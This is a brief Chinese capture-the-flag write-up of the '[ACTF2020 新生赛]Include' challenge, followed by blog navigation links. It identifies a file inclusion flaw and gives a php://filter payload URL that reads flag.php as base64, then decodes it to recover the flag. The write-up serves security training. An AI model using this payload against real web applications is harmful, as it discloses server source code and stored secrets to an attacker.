五、[ACTF2020 新生赛]Include

1.打开题目
五、[ACTF2020 新生赛]Include

点击 tips,跳转->
五、[ACTF2020 新生赛]Include

文件包含,想办法得到文件源码。
2.题目分析
用到PHP伪协议
五、[ACTF2020 新生赛]Include

payload:
http://364c5e69-6889-4c41-a16a-29a949f51006.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
五、[ACTF2020 新生赛]Include
3.获取flag
Base-64解码
五、[ACTF2020 新生赛]Include

上一篇:springmvc集成shiro后 session问题


下一篇:[ACTF2020 新生赛]Include、[ACTF2020 新生赛]Upload 1、[极客大挑战 2019]BabySQL、[ACTF 2020新生赛]Exec、[极客大挑战 2019]Have